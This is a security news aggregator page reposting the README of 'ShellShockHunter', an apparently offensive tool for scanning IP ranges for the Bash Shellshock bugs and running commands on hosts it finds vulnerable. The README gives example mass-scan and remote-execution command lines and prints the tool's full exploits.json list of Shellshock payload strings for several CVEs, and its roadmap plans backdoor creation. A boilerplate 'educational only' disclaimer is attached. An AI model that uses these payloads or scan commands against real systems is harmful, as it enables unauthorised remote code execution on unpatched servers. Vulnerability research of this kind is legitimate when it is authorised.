Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


It's a simple tool for test vulnerability shellshock

Autor:    MrCl0wn
Blog: http://blog.mrcl0wn.com
GitHub: https://github.com/MrCl0wnLab
Twitter: https://twitter.com/MrCl0wnLab
Email: mrcl0wnlab\@\gmail.com

Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.


Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not MrCl0wnLab's responsibility.


Installation

Use the package manager pip


Pip
pip install shodan
pip install ipinfo

Help
python main.py --help

usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] [--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <10>] [--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

optional arguments:
-h, --help show this help message and exit
--file <ips.txt> File targets
--range <ip-start>,<ip-end>
Range IP Ex: 192.168.15.1,192.168.15.100
--cmd-cgi <command shell>
Command: uname -a
--exec-vuln <command shell>
Executing commands on vulnerable targets
--thread <10>, -t <10>
Eg. 20
--check Checker vuln
--ssl Set protocol https
--cgi-file &l t;cgi.txt>
Set file cgi
--timeout <5> Set timeout conection
--all Teste all payloads
--debug Set debugs

Command e.g:
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'

Prints:

START



PROCESS



EXPECIAL COMMAND ( --exec-vuln 'echo "_TARGET_"' )



Source file ( Exploits )

pwd: assets/exploits.json

{
"DEFAULT":
"() { :; }; echo ; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271":
"() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271-2":
"() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
"CVE-2014-6271-3":
"() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
"CVE-2014-7169":
"() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
"CVE-2014-7186":
"/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
"CVE-2014-7187":
"(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
"CVE-2014-6278":
"() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
"CVE-2014-6278-2":
"shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
"CVE-2014-6277":
"() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
"CVE-2014-*":
"() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

Source file ( Config )

pwd: assets/config.json

{
"config": {
"threads": 10,
"path": {
"path_output": "output/",
"path_wordlist": "wordlist/",
"path_modules": "modules/",
"path_assets": "assets/"
},
"files_assets":{
"config": "assets/config.json",
"autor": "assets/autor.json",
"exploits": "assets/exploits.json"
},
"api":{
"shodan":"",
"ipinfo":""
}
}
}

Tree
โ”œโ”€โ”€ assets
โ”‚ย ย  โ”œโ”€โ”€ autor.json
โ”‚ย ย  โ”œโ”€โ”€ config.json
โ”‚ย ย  โ”œโ”€โ”€ exploits.json
โ”‚ย ย  โ””โ”€โ”€ prints
โ”‚ย ย  โ”œโ”€โ”€ banner.png
โ”‚ย ย  โ”œโ”€โ”€ print01.png
โ”‚ย ย  โ”œโ”€โ”€ print02.png
โ”‚ย ย  โ””โ”€โ”€ print03.png
โ”œโ”€โ”€ main.py
โ”œโ”€โ”€ modules
โ”‚ย ย  โ”œโ”€โ”€ banner_shock.py
โ”‚ย ย  โ”œโ”€โ”€ color_shock.py
โ”‚ย ย  โ”œโ”€โ”€ file_shock.py
โ”‚ย ย  โ”œโ”€โ”€ __init__.py
โ”‚ย ย  โ”œโ”€โ”€ request_shock.py
โ”‚ย ย  โ”œโ”€โ”€ shodan_shock.py
โ”‚ย ย  โ””โ”€&#9472 ; thread_shock.py
โ”œโ”€โ”€ output
โ”‚ย ย  โ””โ”€โ”€ vuln.txt
โ”œโ”€โ”€ README.md
โ””โ”€โ”€ wordlist
โ””โ”€โ”€ cgi.txt

Ref

Roadmap

I started this project to study a little more python and interact more with APIS like shodan and ipinfo.

  • Command line structure
  • Banner
  • File management class
  • HttpRequests management class
  • Thread management class
  • Source file for exploits
  • Color in process
  • Shell Exec on vulnerable targets
  • Process debug
  • Integration with ipinfo api
  • Integration with ipinfo api
  • Integration with telegram api
  • Backdoor creation
  • Visual filter
  • Header manipulation


...



๐Ÿ“Œ ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock


๐Ÿ“ˆ 79.36 Punkte

๐Ÿ“Œ #0daytoday #Staubli Jacquard Industrial System JC6 Shellshock Vulnerability [webapps #exploits #Vulnerability #0day #Exploit]


๐Ÿ“ˆ 26.55 Punkte

๐Ÿ“Œ Shellshock In-Depth: Why This Old Vulnerability Wonโ€™t Go Away


๐Ÿ“ˆ 23.31 Punkte

๐Ÿ“Œ Simple-Live-Data-Collection - Simple Live Data Collection Tool


๐Ÿ“ˆ 21.41 Punkte

๐Ÿ“Œ MMD-0037-2015 - A bad Shellshock & Linux/XOR.DDoS CNC "under the hood"


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0027-2014 - Linux ELF bash 0day (shellshock): The fun has only just begun...


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0035-2015 - .IptabLex or .IptabLes on shellshock.. sponsored by ChinaZ actor


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0029-2014 - Warning of Mayhem shellshock attack


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [remote] - Cisco UCS Manager 2.1(1b) - Shellshock Exploit


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Cisco UCS Manager 2.1(1b) Shellshock


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Sun Secure Global Desktop / Oracle Global Desktop Shellshock


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ IPFire Bash Environment Variable Injection (Shellshock)


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [webapps] - NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Shellshock Anniversary: Major Security Flaw Still Going Strong


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0051-2016 - Debungking a tiny ELF remote backdoor (shellcode shellshock part 2)


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Researchers Detect Second Wave of Shellshock Attacks Since Two-Year Anniversary


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [remote] - TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Shellshock Scans Climb Back to 2015 Levels


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ TrendMicro InterScan Web Security Virtual Appliance Shellshock


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [local] - RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ RSSMON / BEAM (Red Star OS 3.0) Shellshock


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0037-2015 - A bad Shellshock & Linux/XOR.DDoS CNC "under the hood"


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0027-2014 - Linux ELF bash 0day (shellshock): The fun has only just begun...


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0035-2015 - .IptabLex or .IptabLes on shellshock.. sponsored by ChinaZ actor


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0029-2014 - Warning of Mayhem shellshock attack


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [webapps] - NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Shellshock Anniversary: Major Security Flaw Still Going Strong


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Shellshock Scans Climb Back to 2015 Levels


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ Researchers Detect Second Wave of Shellshock Attacks Since Two-Year Anniversary


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ [remote] - TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)


๐Ÿ“ˆ 20.07 Punkte

๐Ÿ“Œ TrendMicro InterScan Web Security Virtual Appliance Shellshock


๐Ÿ“ˆ 20.07 Punkte











matomo